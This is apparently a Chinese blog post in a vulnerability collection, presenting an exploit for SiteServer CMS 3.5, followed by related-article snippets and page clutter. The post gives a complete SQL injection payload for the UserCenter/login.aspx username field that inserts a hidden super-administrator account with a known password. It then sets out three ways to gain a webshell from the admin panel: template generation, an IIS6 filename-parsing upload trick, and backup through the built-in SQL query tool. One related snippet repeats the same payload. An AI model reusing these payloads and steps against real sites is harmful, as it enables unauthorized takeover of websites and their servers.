SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

最新推荐文章于 2022-11-02 18:41:00 发布
最新推荐文章于 2022-11-02 18:41:00 发布
阅读量2.6k 收藏 2
点赞数
分类专栏: 漏洞收集 文章标签: SiteServer
经测试秒杀最新的3.5版
stieserver官网:www.siteserver.cn
 
EXP:
 
直接访问UserCenter/login.aspx
 
用户名处输入:
 
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
 
 
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。 之后再访问后台SiteServer/login.aspx用插入的用户登陆。
后台拿webshell的三种方法:
 
一、
 
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
 
二、
 
成员权限-》添加用户-》用户名为:1.asp
 
http://127.0.0.1/usercenter/ 
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
 
(ps:后台添加用户时不会验证是否含有非法字符)
 
三、
 
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称,WEB路径
 
系统工具-》数据库工具-》SQL语句查询
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
 
7禧
关注
专栏目录
SiteServer CMS 6.15.51 安装包
05-01
SiteServer CMS是中国.NET平台CMS系统创始者,同时也是一款开源免费的企业级CMS系统,SiteServer CMS是.NET平台下最强大的企业级开源免费CMS内容管理系统和网站群系统,能以最低的成本、最少的人力投入在最短的时间...
SiteServer CMS v4.1.1601
12-06
SiteServer CMS 是定位于中高端市场的CMS内容管理系统,能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大的网站平台。 SiteServer CMS 是基于微软.NET 平台开发的网站内容管理...
审计一套CMS中的SQL注入
weixin_30790841的博客
08-07 347
漏洞分为系统漏洞和应用漏洞,系统漏洞以二进制漏洞为代表,其挖掘难度较高需要对反汇编和操作系统原理深入理解,而除了系统漏洞以外还有一些应用漏洞,包括不限MySQL,Apache,为代表的Web漏洞,这里我们就挖掘PHP代码层面的漏洞。 漏洞的挖掘也分为,点对点挖掘漏洞,和分散式挖掘漏洞,这我们主要使用点对点挖掘,在挖掘是我们需要找一些关键字,漏洞本身就是两个条件,可控的函数,和可控的变量...
sql注入系统命令 linux,SiteServer 3.4.4最新SQL注入0day
weixin_36134015的博客
05-16 211
这几天在看一个站的时候发现了这个CMS,网上公布了一些漏洞,没说明具体版本,但在我在3.4.4上实际测试的时候发现是无效的,为此专门去官网下了一份最新版,看了一下,发现了一些很搞笑的问题。简介siteserver:本文测试的版本是:SiteServer系列产品最新版本: 3.4.4 正式版 (2011年7月18日发布)下载地址:http://www.siteserver.cn/download客户...
SiteServer 3.4.4 逻辑漏洞导致SQL注入及修复方法
收集盒 Book box
11-18 1250
今天特别发现SiteServe CMS( 3.4.4 )网站根目录多了一个asp文件,我就意识网站可以被挂马了!马上排查,终于在后台发现多了一个blue用户名的超级管理员。我猜想可能是SiteServe CMS系统有漏洞,上网一查,果然把到一堆“SiteServer 3.4.4 逻辑漏洞导致SQL注入”的文章。 ----------------------------------------
siteserver 忘记管理员账号密码怎么办
hyb3280660的专栏
09-14 783
siteserver 忘记管理员账号密码怎么办 打开数据库,找到siteServer数据表:siteserver_Administrator,如下图所示: 把Password字段改成你需要设置的明文密码,把PasswordFormat字段值改成Clear,保存后,重新打开网站后台即可使用此账号密码登录后台,SiteServer程序会自动理你刚才添加的密码。 ...
学习笔记-B/S - Exploits
热门推荐
人饭子的博客
11-02 3万+
B/S - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 各类论坛/CMS框架 AEM 74CMS dedeCMS Discuz Discuz Discuz!ML Drupal ECshop Fastadmin Laravel jeecg jeewms Joomla Maccms MetIn...
ASP.NET源码——[CMS程序]SiteServer CMS 3.3.7 SQL版.zip
10-08
SiteServer CMS 3.3.7 SQL版是一款基于ASP.NET技术构建的内容管理系统(CMS),它为企业级网站开发提供了强大的功能和灵活的定制性。这款源码的发布旨在帮助开发者理解和学习如何利用ASP.NET来构建类似的应用,同时...
ASP.NET源码——[CMS程序]SiteServer CMS 3.3.7 ACC版.zip
10-08
SiteServer CMS 3.3.7 ACC版是一个基于ASP.NET技术构建的内容管理系统(CMS),它为企业级网站提供了全面的建站、管理和服务解决方案。这款CMS系统以其高效、稳定和易于扩展的特点,在行业内受到广泛认可。从提供的...
ASP.NET源码——[CMS程序]SiteServer CMS v2.6.0 SQL版.zip
10-08
**ASP.NET 源码分析:SiteServer CMS v2.6.0 SQL版** ASP.NET 是微软公司开发的一种Web应用程序框架,它允许开发者使用.NET Framework和C#、VB.NET等语言构建高性能、安全且可扩展的网站应用。SiteServer CMS(内容...
帝国cms公文签收
04-09
phpcms公文签收功能的开发.在帝国cms基础上开发的。
SiteServer CMS 二次开发简明教程
08-24
SiteServer CMS 二次开发简明教程
ASP.Net之使用Cookie和Session实现自动登录
松一160
06-30 5257
一、UserLogin.aspx代码 window.onload = function () { var validateCode = document.getElementById("validateCode"); validateCode.onclick = function () {
内网渗透思路学习——靶场实战——暗月项目七
qq_45612828的博客
08-17 6813
内网渗透思路学习——靶场实战——暗月项目七。学习一下内网渗透中的一些攻击思路和技巧(比如常见的横向、纵向渗透、代理穿透、提权、免杀等等)
3 爬虫 模拟登录 异步爬虫
健浩的博客
07-06 594
爬虫 1 模拟登录 1.1 模拟登录古诗文网 古诗文网登陆页面:https://so.gushiwen.org/user/login.aspx?from=http://so.gushiwen.org/user/collect.aspx 点击登录按钮的请求参数 Request URL: https://so.gushiwen.org/user/login.aspx?from=http://so.gushiwen.org/user/collect.aspx Request Method: POST Form
SiteServer CMS 0Day
p656456564545的专栏
01-09 2795
经测试秒杀最新的3.5版   EXP: 直接访问UserCenter/login.aspx 用户名输入: 123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypte
0Day 密码重置dede阿帕奇强制安装
weixin_30337157的博客
07-09 77
CMS:siteserver 关键词: inurl:siteserver/login.aspx inurl:siteserver/forgetPassword.aspx 操作:F12 禁用JS getshell:添加上传文件格式,上次一句话或者大马 ===================================== dedecms 阿帕奇安装漏洞环境:阿帕奇抓包改url...
siteserver cms v6
最新发布
09-17
SiteServer CMS V6是一款功能强大的内容管理系统。它是基于.NET技术开发的,具有开源、高效、安全等优点。 SiteServer CMS V6提供了丰富的功能和灵活的模块化架构,可以满足不同网站的需求。它支持多种内容类型,包括文章、图片、视频等。同时,它还提供了强大的用户管理功能,可以灵活地设置用户权限,管理用户信息。此外,SiteServer CMS V6还支持多语言和多站点管理,方便用户进行多语言的网站建设和管理。 SiteServer CMS V6还具有高性能和高可扩展性。它采用了缓存技术和分布式部署,可以有效地提升网站的访问速度和并发性能。而且,SiteServer CMS V6还支持插件扩展和自定义开发,用户可以根据自己的需求添加功能或进行定制开发。 此外,SiteServer CMS V6还注重安全性。它提供了多种安全策略,包括用户权限管理、数据访问控制等。同时,SiteServer CMS V6还具备高度的防护能力,可以抵御常见的网络攻击,保障网站的安全。 综上所述,SiteServer CMS V6具有丰富的功能、卓越的性能和高度的安全性,是建设和管理网站的理想选择。无论是个人博客、企业官网还是电子商务平台,SiteServer CMS V6都能够提供强大的支持,并为用户提供优秀的网站体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值